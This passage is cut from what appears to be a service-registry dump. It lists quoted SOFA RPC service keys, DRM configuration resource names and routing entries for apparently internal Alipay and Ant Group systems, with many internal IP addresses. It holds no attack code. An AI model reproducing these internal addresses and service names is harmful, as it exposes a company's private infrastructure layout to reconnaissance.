stDataService:1.0:dataOfIndexFundService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@finpdcenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCCreditTempCreditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_turorail_zhiweiDss#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.146.114#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securityexprod.biz.alipayauth.service.AlipayAuthSyncUserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apopscompose.common.service.facade.processtemplate.ProcessTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.openAuthQueryAuthPageSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finassetinsight@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmhatcher.common.service.facade.api.ZmBorrowVoucherConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditint.facade.service.RepayQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifprocess:name=com.alipay.cifprocess.drm.CIFINAgentSwitcher.namedRate,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemng.facade.ebpp.EbppBillFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vouchercore.facade.api.template.TemplateManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchantsettle.service.common.facade.SettleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qianli.common.service.neardata.facade.QianliDbControlFacade:1.0:giftprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@pcbenefitcore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_100.83.217.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitysimulate.common.service.client.msgbroker.MsgBrokerListener:1.0:zeroxrisk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.api.JsApiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayCardModeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.biz.service.test.Test:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.enterprisesteward.quota.EnterpriseStewardQuotaManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openexprod.common.service.facade.PartnerExterfaceOpenexprodFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@mdeviceprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.artisan.facade.component.GraphQLDpiHelperFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.YebOpenAccountService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityassistant.common.service.facade.flow.FlowAuthorizeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.100.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_GFFUND_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.openhome:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.open.facade.OpenSecuUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:decisioncenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antmember.common.service.facade.growthplus.front.GplusHomeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.30.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.common.service.facade.dataaccess.StandardDataAccessQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:kbinteligentpromo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.biz.crowd.gw.FriendViewNameQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.infosec:name=com.alipay.infosec.common.service.facade.ldc.SecurityLdcSwitchResource.switchZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:pcloanpromo@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditsceneprod.facade.PcreditCharityProjectQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_HEALTH_CHECK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.poscore:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.shadowExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.gloanapply.common.service.facade.apply.api.LoanApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.useBeta,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.octopus.core.facade.InvokeFacade:1.0:abilitycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:dcepboss_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.tradeapcore.common.service.integration.drm.resource.DrmForCommonManageResource.customTimeOutSwitchRules,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antcloud.usercenter.biz.service.impl.sofarest.AgreementManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.124.242#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:kmi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:doppler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.common.service.facade.linkide.api.AccurateCaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insthemis.service.facade.dispatch.DispatchOperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.spi.service.MobileSearchSpiService:1.0:fininsightcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mymdp.common.service.facade.service.flow.OfflineFlowService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicreateweb.api.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesecurity.common.service.api.password.PasswordFacade:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.iot.promote.IotPromoteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.service.facade.flow.RiskAiGoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.PublicityClaimThanksFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.236#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.groot:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instpay.facade.asset.InstFluxService:1.0:insttrade@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.necbill.common.service.admin.EcbillToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qianli.common.service.neardata.mock.facade.MockOperationFacade:1.0:mobileha@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatadecision.common.service.facade.InsightQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.GiftMessageVisibleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.202#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.test.SimpleService-44#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fapcore.facade.doc.AssetFeatureOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemng.facade.ebppprod.CZRouteRuleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.commissioncenter.common.service.facade.api.UniformDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.security.sandbox.runtime.facade.service.SecuritySandboxExperimentDataFacade:1.0:infoseclab@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.open.facade.OpenReplyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.commandcenter.service.facade.api.CodeChangeExtendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:loginantzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.aks.facade.autoscaler.NodeGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.toutiaoPropagationLevelLow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.wall.common.service.QualityCostomerCreateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_AMLDATA#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.echox.drm.EchoxDataGatherDrm.echoxGatherConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.batchfund.common.service.facade.trans.api.BankCodeFileInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.232.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.gloanuserproxy.facade.api.AuthorizationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.surlPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.82.87.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.college.comment.CommentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.common.service.facade.AssetIsolationAccountQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcredittrans.facade.platform.api.PctOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.msecuritycore.service.policy.inner.service.SecurityMobileAdvicePolicyServiceForSc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.facade.api.slip.SlipAckAdvanceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.intclcn.common.service.facade.LoanIntClcnRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.core.service.process.ServiceTask:1.0:imatchCdpServiceTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_RULECENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_ats_guaranteeRuleUpdateImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.common.service.facade.update.TaskStrategyUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.AcsAccountDRM.accountName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.definfund.facade.api.DefinfundApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finnet.service.facade.open.spi.FinnetSpiReceiveRService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.76.143#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.cryptprod.common.service.facade.CipherCertQueryFacade:1.0:fccryptprod.boss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.dal.SchemaRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.etetestcore:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.160.254#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.45.75.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditmerchant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.rate.triple.RateRenderTriple:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.tag.TagServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.OrderAuditAfterValidService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.118.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.166.235.165#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:quotexchangesofa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.cif.client.drm.CifClientDrmSwitch.charge.clientReadGroupSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.autobizcore.common.fundamental.datafacade.WorkSpaceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.enterprise.facade.EntGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finassistantcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.core.service.reindeer.GoodsDeliveryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.236.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.oceanbase.obforumcore.service.activity.ActivityGuideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csportal.service.facade.api.AccountInfoQueryProxyFacade:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.127.228#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gffund.common.service.facade.api.StandardVoucherOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.fcbuservice.common.service.facade.manager.AuthManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.70.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.iexchange.service.facade.rate.BlockChainRateOperateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.96.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.koa-patch:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.closeLoggers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.39.185.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbcontentprod.common.service.facade.api.enroll.EnrollFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.facade.roll.policy.api.RollPolicyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linglongmng.facade.api.LinglongMngFacade:1.0:600003@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.iot.tangula.facade.psyche.PsycheService:1.0:tangula@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.msgbroker.CommentDeleteMsgProcessor:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.o2o.facade.OperatorShopRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:iatanymock#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kgopen.container.facade.api.KgopenOperationFacade:1.0:offlineainlp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegeocoding.common.service.facade.nearby.NearBySearchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.atcenter.service.facade.api.AccountingConfigApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.consumetrade.service.ConsumeTransGoodsManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promodmp.service.facade.crowd.CrowdManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.arks:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.finslip.finreconSlaveTddlDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mappprod.common.service.facade.operator.OperatorServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@mypointsblock#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.openeval.core.service.emulator.dal.logsim.labtaskdata.OeEmulatorLabTaskDataRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.BdmParaConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.ContentSecCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffintrade.common.service.facade.api.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.multimediabase.facade.scene.GroupProxyFacade:1.0:groupProxyFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.27.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gfas.facade.api.OmittedInwardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:publicDomain_fininsightcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.admin.service.StrategyPacketFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.193.182#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:dchaincustomer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_192.168.10.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.mobilepep.drm.NearJarConfigDrm.bizTypePriority,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeco.facade.admittance.AdmittanceProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetnet.common.service.facade.api.AbsReportingServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.titan.dmc.common.service.facade.TitanServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:cubeserver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.subscription.SubscribeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.implement.ImplementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.BizDataPullFacade:1.0:ebppcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmobile.common.service.community.facade.ReplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:securitycore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.metadata.service.ReportTemplateService:1.0:reportTemplateService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.core.service.bizCoverage.BcTableService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cdl.digital.logistic.business.rpc.LogisticBusinessOpProvider:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ordercore.common.service.facade.order.OrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cscheck.service.facade.api.IdeployQcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.ServiceInvokeReportConfigSwitch.enabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ipromofront.common.service.facade.service.rpc.SceneContentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.AntEventContextDrmSwitch.eventWithCodeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_ALIPAY_RATE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.developertool.facade.ia.FlowFactorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mychain.gov.common.facade.api.TdcVerifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.OpenCreateMiniAppManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.mfinpromo.MfinpromoEquityInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.AppInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_ats_healthRuleFrontService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentfusion.common.service.facade.contentfusion.CardTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.query.YebsFundInfoConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.tradeexprod.tradeexprod_mservice_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchcommerce.core.api.biz.shopinfo.ShopInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unibase.common.service.facade.api.venue.VenueManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sdaruleengine.common.service.facade.api.IotRuleEngineManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.124.166.217#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemsgprod.common.service.facade.subscribe.SubscribeRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.storeValidateDetail,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:ipromofront@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.facade.service.P2pDisclosureAuditManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.floor.FloorMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finslip.common.service.facade.recon.ReconRecoveryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.settle.RewardManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.process.EinvProcessQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.AppMngManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.settleprod.service.facade.installment.InstallmentConsultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_B_BATCH_REFUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.promocenter.facade.api.prototype.AppPromoEquityServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.dctlib.common.repository.mng.HealthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acauthcore.common.service.facade.manager.CategoryManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:nfcc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.140.122#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitydata:name=com.alipay.securitydata.biz.service.impl.drm.AntqMsgMngResource.consumerRunModeEvent1,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfocore.common.service.facade.fop.api.ShopDecorateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","